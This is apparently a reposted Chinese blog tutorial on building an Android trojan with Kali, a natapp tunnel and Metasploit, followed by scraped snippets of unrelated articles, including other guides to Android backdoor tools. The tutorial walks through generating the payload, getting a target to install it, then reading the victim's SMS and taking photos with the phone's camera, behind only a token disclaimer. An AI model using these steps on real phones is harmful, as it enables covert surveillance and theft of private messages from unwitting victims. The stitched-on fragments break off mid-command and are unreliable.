利用kali生成木马远程控制安卓手机

首先控制安卓手机,需要生成一个木马,生成后门

kali的IP地址:172.16.3.45

1.要达到远程控制安卓手机,你需要避开公网,所以在这里可以去买条隧道,我使用的是natapp里面的隧道

在natapp里面注册登录,可以去免费领取一条隧道,也可以去购买隧道,都很实惠的

2.获得隧道对应的IP地址以及端口号

首先配置隧道参数

ip地址选择你的kali的IP地址,本地端口尽量选择高位端口

下载natapp,打开

natapp -authtoken=**********   (********为隧道的authtoken,可以在natapp里面我的隧道查看      回车)

3

可以得到等下做木马的时候需要配置的端口(也就是上图的38070),,,等等,,是不是还有一个IP地址没设?OK,下一步就来了

复制server.natappfree.cc,然后再打开另一个命令行,PING,就可以得到等下做木马需要的IP地址

4.至此,生成木马所需要的参数都有了,下一步打开kali生成木马

这里的lhost=IP地址是你PING  server.natappfree.cc得出来的IP地址

5.将生成的木马发送给目标手机让其安装

6.在kali里面进行监听

(可以直接在命令行里面输入msfconsole,也可以打开箭头的应用)

7.设置模块及载荷

8.开始设置监听的参数(可以先show options 查看需要设置哪些参数)

这里的lhost是自己kali的IP地址

lport要对应你在natapp网站里面设置的端口

9.让对方安卓手机打开木马

建立连接成功!

10.可以干“坏事”了

下载对方短信

打开下载的文件打开

没关系,改下编码就行了

查看手机的摄像头

webcam_list

摄像头拍照

webcam_stream 1

还有很多很多功能 可以输入help进行查看,这里我就不进行一一列举了

注意了不要真的去干坏事哦

原文地址:https://www.cnblogs.com/zzayl/p/12162743.html

时间: 2024-10-07 12:56:47

利用kali生成木马远程控制安卓手机的相关文章

Kali环境使用Metasploit生成木马入侵安卓手机

Metasploit是一款开源的安全漏洞检测工具,可以帮助安全和IT专业人士识别安全性问题,验证漏洞的缓解措施,并管理专家驱动的安全性进行评估,提供真正的安全风险情报.这些功能包括智能开发,代码审计,Web应用程序扫描,社会工程.团队合作,在Metasploit和综合报告提出了他们的发现. 环境准备: Kali2.0(msfVENOM.metasploit)安卓手机或安卓模拟器 利用过程: 先查看本地IP地址 使用msfvenom生成apk木马 1 msfvenom -p android/met

三分钟,利用 Termux 将你的安卓手机变成 linux 服务器 (非密钥)

转自:https://blog.csdn.net/sinat_34885663/article/details/86155707 三分钟,利用 Termux 将你的安卓手机变成 linux 服务器 (非密钥)关键词:Termux,ssh,安卓,linux,服务器 入手小米MIX3 之后刚巧闲置了一台碎屏 小米6,想着利用起来,结果就遇到了大杀器 Termux ,安卓端可以用 linux 命令而且还支持 apt 有木有!!! 于是就想着利用它搭建一个小小的服务器供自己娱乐 但是之前搜索过很多方法,

exchange2010安卓手机无法配置exchange邮件

今天朋友给我反馈了一个问题,他所在的公司所有安卓手机无法配置exchange邮箱,提示:"验证失败,请检查网络 连接或服务器设置"但是PC端outlook却没有问题. 经过各种方式验证,服务器的内网外解析都没有问题.autodiscover也没有问题 做测试的时候发现新创建的邮箱是可以使用的.朋友反馈说这个公司是在别的公司分出来的,做过AD账号迁移 想到是否用户权限是存在问题 所以将新邮箱的权限和老邮箱的权限进行对比是否有什么区别 打开新邮箱的安装选项,选择高级 如下两张图所示.以前的

利用Android Lost通过互联网或短信远程控制安卓设备

作者:Jack Wallen| 杰克·瓦伦翻译:PurpleEndurer,2014-11-15第1版 使用智能手机要考虑的一个至关重要的因素是安全性.当然,安全问题不仅仅存在于平台开发商之手,手机用户自身也难脱干系.为什么这么说呢?手机用户会丢失手机.这类事情不绝于耳,其中甚至充斥着"我公司的数据就在那部手机里"的不幸遭遇.你要采取什么措施来防止自己陷入这样的困境呢? 太简单了--安装一款类似Android Lost的应用软件.利用它(或其它类似的应用),你就可以通过互联网或短信服务

【Android】利用Fiddler进行抓包详解教程。抓取接口以及数据,可以抓真实安卓手机或者模拟器。

大家都知道抓包的方法很多.我这里给大家介绍介绍一种,利用fiddler进行抓包,当然比如Wireshark也可以抓包,我们这里不做介绍.我这里演示的是fiddler+天天模拟器,当然真实安卓手机也是一样的.而且也可以观察自己pc电脑的数据.如果抓安卓手机的数据,手机建议连接自己电脑的无线网.因为fiddler只是一个代理,需要将手机的代理指向 PC 机,不能互相访问是不行的.只是简单地教你使用抓包,算是入门吧,更深的技术请自行在研究吧. 准备工具: fiddler软件+天天模拟器 (关于软件自己

部分安卓手机微信浏览器中使用XMLHttpRequest 2上传图片显示字节数为0的解决办法

前端JS中使用XMLHttpRequest 2上传图片到服务器,PC端和大部分手机上都正常,但在少部分安卓手机上上传失败,服务器上查看图片,显示字节数为0.下面是上传图片的核心代码: HTML <input type="file" id="choose" capture="camera" accept="image/*"> JavaScript var filechooser = document.getEleme

安卓手机的后门控制工具SPADE

SPADE,一款安卓手机的后门控制工具,安全研究人员可以以此了解和研究安卓后门原理. 首先,我们从网站www.apk4fun.com下载apk文件,如ccleaner.然后,我们安装spade git clone https://github.com/suraj-root/spade.git 之后,利用以下命令开始捆绑恶意载体 ./spade.py /root/Desktop/ccleaner.apk 有6种不同payload可供选择,设置完lhost和lport,将会生成恶意payload 选

强大的安卓手机远程管理工具 – Droidjack

免责声明:本站提供安全工具.程序(方法)可能带有攻击性,仅供安全研究与教学之用,风险自负! Droidjack是一款针对安卓手机远程管理工具,你可以利用它在PC上对手机进行远程操控,不仅功能强大,使用也很方便. 功能特性 1.可以生成一个APK,绑定在被控手机的任何APP上 2.可在电脑端控制手机,包括浏览.传输.删除文件等 3.可进行SMS短信收发和查看功能 4.可以控制手机的电话功能 5.联系人管理 6.麦克风监听 7.GPS定位 8.APP管理 测试截图 再次提醒大家,不用滥用安全工具的功

如何正确的对安卓手机进行数据恢复?

摘要: 很多人觉得数据恢复就是拿工具扫一扫,这种想法是非常错误的.想干好一件事,绝不是仅仅机械性的重复固有动作,必须要加入个人的思考.比如对安卓手机的数据恢复,你真的会吗? 0×00 背景介绍 很多人都有在使用手机时误删数据的经历,比方说和女朋友分手后把之前一起玩耍的影像资料删除了,结果没过几天又复合了,某天女朋友想和你一起回忆某个温馨时刻,这时候拿不出照片或视频来会非常尴尬. 很多人觉得数据恢复就是拿工具扫一扫,这种想法是非常错误的.想干好一件事,绝不是仅仅机械性的重复固有动作,必须要加入个人